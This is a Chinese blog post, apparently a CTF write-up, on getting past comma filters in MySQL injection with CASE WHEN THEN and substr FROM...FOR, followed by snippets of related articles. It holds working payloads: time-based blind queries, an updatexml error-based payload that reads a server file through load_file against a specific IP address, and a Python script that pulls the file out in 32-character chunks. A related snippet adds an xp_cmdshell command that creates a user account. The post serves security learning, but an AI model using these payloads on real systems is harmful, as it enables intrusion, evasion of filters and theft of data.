SQL注入之逗号拦截绕过

最新推荐文章于 2024-07-30 10:50:29 发布
最新推荐文章于 2024-07-30 10:50:29 发布
阅读量3k 收藏 4
点赞数
分类专栏: ctf 文章标签: SQL注入 from for分页读取 逗号拦截绕过 case when then join

转载自:https://www.cnblogs.com/nul1/p/9333599.html

目前所知博主仅知的两个方法

1.通过case when then

2.join

[一]case when then

 

mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 for 1) = 'l' then sleep(3) else 0 end;
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
| ID | adminName | adminPassWord | adminLov | adminConfig | adminClass | adminLock | adminDate |
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
| 1 | admin | a797ba2993304483f0d180e25d14319a | 520 | | NULL | SgrRUQ | 2010-04-14 00:00:00 |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |
+----+-----------+----------------------------------+----------+-------------+------------+-----------+---------------------+
2 rows in set (3.00 sec)

 

  相关知识[1]https://www.cnblogs.com/nul1/p/8727873.html

case when 条件1 then 条件2 else 条件3 end;       #如果条件1成立就执行条件2否则执行条件3 

MySQL当中的case when then

其实就相当于if else:而且也可以用if来替代。

  case whent 条件1 then 条件2 else 条件3 end;

如果条件1成立就执行条件2否则执行条件3 

 

1 mysql> select case when 1=1 then sleep(2) else 0 end;
2 +----------------------------------------+
3 | case when 1=1 then sleep(2) else 0 end |
4 +----------------------------------------+
5 | 0                                      |
6 +----------------------------------------+
7 row in set (2.00 sec)

 

 如果1=1成立则延时两秒 不

  相关知识[2]https://www.cnblogs.com/nul1/p/9297045.html

from 1 for 1 #分页,前面的1代表截第几个,后面的1代表截取的长度.

SQL注入文件读取通过from for分页读取

http://103.238.227.13:10088/?id=1

在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下,看到别人使用from for说实在此前真不知道这操作。

先来看一下from for吧

复制代码

 1 mysql> select database();
 2 +------------+
 3 | database() |
 4 +------------+
 5 | typecho    |
 6 +------------+
 7 1 row in set (0.00 sec)
 8 
 9 mysql> select substr(database() from 1 for 2);
10 +---------------------------------+
11 | substr(database() from 1 for 2) |
12 +---------------------------------+
13 | ty                              |
14 +---------------------------------+
15 1 row in set (0.00 sec)
16 
17 mysql> select substr(database() from 2 for 3);
18 +---------------------------------+
19 | substr(database() from 2 for 3) |
20 +---------------------------------+
21 | ype                             |
22 +---------------------------------+
23 1 row in set (0.00 sec)
#说明前面一个数字是从第几个开始读取,最后的一个数字是读取的长度。

复制代码

大概懂了吧,就是起到一个分页的效果。

那么再用到注入里自然就OK了。

PS:过滤了空格可以用使用/**/进行替换,还有就是updatexml最多只能显示32位的长度,所以for的数字是32。

http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/1/**/for/**/32)),1),1)

然后写一个脚本吧from后面的数字每次+32,for也要加就可以了。

以下脚本待完善。

 1 #!/usr/bin/env python
 2 #encoding:utf-8
 3 #by i3ekr
 4 
 5 import requests,re
 6 from lxml import etree
 7 n1 = 1
 8 n2 = 32
 9 
10 for i in range(0,100):
11     url ="""
12 http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/%d/**/for/**/%d)),1),1)
13     """%(n1,n2)
14     html = requests.get(url,timeout=5).text
15     print(html)
16     result=re.findall(html,"[A-Z][0-9][A-Z][0-9]")
17     result = re.findall("[A-Z][0-9][A-Z][0-9]{29}",html)
18     print(result)
19     n1+=31
20     n2+=32

 

 

[二]join

 https://www.cnblogs.com/i-honey/p/8203954.html

xuchen16
关注
专栏目录
SQL 注入绕过技术再次总结
m0_61506558的博客
10-24 359
产品的规则越来越完善,所以御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。空格 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!SQL 注入绕过技术 已经是一个老生常谈的内容了,注入可以使用某些云。脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。注入,也有一些产品会在服务器安装软件,例如 iis。waf 加速乐等安全产品,这些产品会自带 waf。
Web安全--SQL注入
bobo_milk的博客
11-10 575
floor():id=1' and (select 1 from (select count(*),concat(操作代码,floor(rand(0)*2))x from information_schema.tables group by x)a) --+extractvalue():id=1' union select 1,(extractvalue(1,concat(0x7e,(select 操作代码)))) --+最快的办法就是使用工具跑,可以使用bp的intruder进行爆破字符。
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 950
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
mysql注入过滤逗号_SQL注入绕过的技巧总结
weixin_42488542的博客
02-02 1864
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤。SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章...
【WAF BYPASS】SQL注入漏洞之WAF绕过方式探索(万种)
最新发布
weixin_70940440的博客
07-30 1979
但这只是一种简单的护措施。(注意:在 SQL 中,XOR(异或)运算符用于比较两个布尔表达式,如果两个表达式的结果不同(一个为真,一个为假),则XOR的结果为真;外部的查询SELECT * FROM users WHERE age > (子查询的结果) :从users表中选择所有年龄大于子查询计算出的平均年龄的记录,并返回所有列( * 表示所有列)。CHAR(101) 对应字符 'e',CHAR(97) 对应字符 'a',CHAR(115) 对应字符 's',CHAR(116) 对应字符 't'。
SQL注入逗号绕过
weixin_42478365的博客
05-03 1109
1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7…n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截逗号时,我们的联合查询不能用了。 绕过 在显示位上替换为常见的注入变量或其它语句 union select 1,2,3; union select * from ((select 1)A join (select 2)B join (select 3)C); union select * from ((select 1)A join (sele
[SQL注入] 逗号拦截绕过
weixin_34218890的博客
06-20 466
SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。 然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。 但是如果有WAF...
SQL注入--显注和盲注中过滤逗号绕过
diecai2192的博客
08-16 1693
SQL注入逗号绕过 1.联合查询显注绕过逗号 在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截逗号时,我们的联合查询不能用了。 绕过 在显示位上替换为常见的注入变量或其它语句 union select 1,2,3; union select * from ((select 1)A join (se...
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
Web应用安全领域中,SQL注入是一种常见的攻击手段,它允许恶意用户通过构造特定的SQL语句,绕过系统的身份验证,获取或修改数据库中的敏感信息。以下是对"使用SQL注入绕过认证"实验的详细说明: 一、实验目的 1. ...
SQL注入绕过WAF方法使用
m0_55563900的博客
03-13 2258
介绍WAF WAF (Web Application Firewall, Web应用火墙)及与其相关的知识,这里利用国际上公认的一种说法: Web应用火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专]为Web应用提供保护的一款产品。 WAF可以分为以下几类 1.软件型WAF 以软件形式装在所保护的服务器上的WAF,由于安装在服务器上,所以可以接触到服务器上的文件,直接检测服务器上是否存在WebShell、是否有文件被创建等。 2.硬件型WAF 以硬件形式部署在链路中,支持多种部署方式,当串联到
暑期练习web22:sqli (i春秋) sql盲注,逗号绕过
qq_41618162的博客
08-23 1110
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
SQL注入简单总结——过滤逗号注入.pdf
04-08
SQL注入简单总结——过滤逗号注入
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
mysql注入过滤逗号_[SQL注入] 逗号拦截绕过
weixin_39906245的博客
02-02 957
SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。但是如果有WAF拦截了逗...
mysql注入过滤逗号_SQL注入--显注和盲注中过滤逗号绕过
weixin_32463071的博客
01-30 751
SQL注入逗号绕过1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截逗号时,我们的联合查询不能用了。绕过在显示位上替换为常见的注入变量或其它语句union select 1,2,3;union select * from ((select 1)A join (select 2)B joi...
关于SQL注入绕过逗号过滤
weixin_43247256的博客
01-27 7077
CTF sql注入题目。
php 注入 过滤逗号,SQL注入逗号过滤绕过
weixin_34900470的博客
03-25 375
在常规CTF的sql注入的时候都会过滤一些我们不喜欢被过滤的字符,比如这次的逗号,在盲注的时候用到substr函数和union的查询都用到了逗号,过滤了逗号怎么绕过呢?百度了一番。。。。。百度真是。。。。。还是谷歌吧,终于找到了一些方法,这里记录下来最简单的吧0x0盲注我们用sqli-labs平台练手,http://127.0.0.1/sqli-labs/Less-1/index.php?id=1...
SQL注入绕过WAF策略与技巧解析
以下是一些常用的SQL注入绕过WAF的方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数传递恶意SQL代码。 - POST注入:在表单提交的数据中插入SQL。 - COOKIE注入:利用HTTP头或Cookie中的数据进行注入。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值